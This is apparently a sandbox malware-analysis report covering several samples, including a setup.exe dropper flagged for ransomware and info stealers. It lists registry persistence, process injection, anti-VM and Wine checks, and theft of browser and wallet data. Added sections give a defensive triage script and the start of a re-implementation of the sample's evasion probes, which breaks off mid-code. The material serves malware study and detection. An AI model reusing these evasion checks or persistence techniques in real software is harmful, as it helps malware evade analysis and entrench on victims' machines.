Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\WOW6432Node\Interface C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000_Classes\WOW6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2852 wrote to memory of 4464 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2852 wrote to memory of 4464 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2852 wrote to memory of 4464 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 205.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win10v2004-20240221-en

Max time kernel

91s

Max time network

153s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1100 wrote to memory of 5084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1100 wrote to memory of 5084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1100 wrote to memory of 5084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 205.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 198.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:49

Platform

win10v2004-20240221-en

Max time kernel

138s

Max time network

158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4780 wrote to memory of 1416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4780 wrote to memory of 1416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4780 wrote to memory of 1416 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1416 -ip 1416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 588

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 206.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 196.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:51

Platform

win10v2004-20240221-en

Max time kernel

166s

Max time network

289s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2972_133531841536410118\WW9_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Software\Wine C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6822f988-ccf5-4e57-afb4-dd971c700c06\\xVovRr115da5UGt7mKVb47Cj.exe\" --AutoStart" C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A
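
The two persistence mechanisms recorded above, the Run keys written here (SysHelper pointing at a GUID-named directory under AppData\Local with an --AutoStart argument, ExtreamFanV5 pointing at AppData\Local) and the COM registration performed by regsvr32 in behavioral4 (an InprocServer32 default value pointing at ICQLiteShell.dll in %TEMP%, wired into the `*` and `Directory` context-menu handlers so explorer.exe loads it), share one triage question: does an autostart or COM server resolve to a file in a user-writable directory? The script below is an added example, not part of this report or of the sandbox that produced it. It parses the report's own "Set value (str)" lines, pulls the image path out of the data, and flags Run/RunOnce entries and InprocServer32/LocalServer32 defaults under user-writable prefixes. The writable-prefix list is a simplifying assumption (real triage checks the file's ACL), the four report lines are copied verbatim, and the fifth input line is a constructed benign entry. It does not cover the Startup-folder .lnk or the GroupPolicy Registry.pol modifications also listed in behavioral14.

```python
"""
Triage of the sandbox's "Set value (str)" registry events: parse each line into
(key, value name, data, writing process) and flag autorun entries and COM
servers whose image lives in a user-writable directory.
Added example; not part of the report or of any tool named in it.
"""
import re
from dataclasses import dataclass
from typing import List, NamedTuple, Optional

# One event per line, in the report's own layout:
#   Set value (<type>) <key>\<name> = "<data>" <process> N/A
# <data> is quoted, with backslashes doubled and embedded quotes escaped.
LINE_RE = re.compile(
    r'^Set value \((?P<type>\w+)\) (?P<path>\S+) = '
    r'"(?P<data>(?:[^"\\]|\\.)*)" (?P<process>.+?) N/A$'
)

# Assumption: directories an unprivileged user can write to. Real triage
# should check the ACL of the actual file instead of a prefix list.
WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


class RegEvent(NamedTuple):
    key: str
    name: str      # "" for the key's default value
    data: str
    process: str


@dataclass
class Finding:
    kind: str      # "autorun" or "com-server"
    key: str
    name: str
    image: str
    process: str


def parse_line(line: str) -> Optional[RegEvent]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    key, _, name = m["path"].rpartition("\\")
    data = re.sub(r"\\(.)", r"\1", m["data"])  # undo the report's escaping
    return RegEvent(key, name, data, m["process"])


def image_path(data: str) -> Optional[str]:
    """Pull the executable/DLL path out of a Run or InprocServer32 value."""
    data = data.strip()
    if data.startswith('"'):               # "C:\path\x.exe" --args
        end = data.find('"', 1)
        return data[1:end] if end > 1 else None
    token = data.split(" ", 1)[0]          # C:\path\x.exe, or a CLSID
    return token if re.match(r"^[A-Za-z]:\\", token) else None


def user_writable(path: str) -> bool:
    return path.lower().startswith(WRITABLE_PREFIXES)


def classify(ev: RegEvent) -> Optional[str]:
    tail = ev.key.rpartition("\\")[2].lower()
    if tail in ("run", "runonce") and "\\currentversion\\" in ev.key.lower():
        return "autorun"
    if tail in ("inprocserver32", "localserver32") and ev.name == "":
        return "com-server"
    return None


def triage(lines) -> List[Finding]:
    findings: List[Finding] = []
    for line in lines:
        ev = parse_line(line)
        kind = classify(ev) if ev else None
        if kind is None:
            continue
        image = image_path(ev.data)
        if image and user_writable(image):
            findings.append(Finding(kind, ev.key, ev.name, image, ev.process))
    return findings


# Constructed input: the first four lines are copied from this report
# (behavioral4 and behavioral14); the last is a made-up benign entry.
SAMPLE_LINES = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6822f988-ccf5-4e57-afb4-dd971c700c06\\xVovRr115da5UGt7mKVb47Cj.exe\" --AutoStart" C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent = "\"C:\\Program Files\\Vendor\\Agent.exe\" /tray" C:\Program Files\Vendor\Setup.exe N/A',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        leaf = f.key.rpartition("\\")[2]
        print(f"{f.kind:10} {leaf}\\{f.name or '(Default)'} -> {f.image}  [written by {f.process}]")
```

Running it on the five constructed lines reports the InprocServer32 default and the two Run entries; the context-menu handler line (a CLSID, not a path) and the Program Files entry are passed over.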

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
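
The evasion checks recorded in this detonation (opening HARDWARE\ACPI\DSDT\VBOX__, reading SystemBiosVersion and VideoBiosVersion, opening HKCU\Software\Wine, and reading EnableLUA above) are all plain registry reads, which matters for two reasons: Sysmon's registry events (12/13/14) cover key creation, value writes and renames but not reads, so these probes leave no Sysmon trace; and an analysis VM that wants the sample to continue past them has to present clean values, not just hide its tooling. The function below is an added example, not the sample's code and not part of this report: it re-implements the same probes as a pure function over a snapshot of registry values so the decision logic can be tested offline. The report shows which keys and values are read, not which substrings the sample compares against, so the marker list is an assumption, as are the two constructed snapshots.

```python
"""
The registry probes recorded in this detonation (VBOX__ ACPI table key,
SystemBiosVersion / VideoBiosVersion, HKCU\Software\Wine, EnableLUA),
re-implemented as a pure function over a snapshot of registry values.
Added example; not the sample's own code.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Paths exactly as the sandbox prints them.
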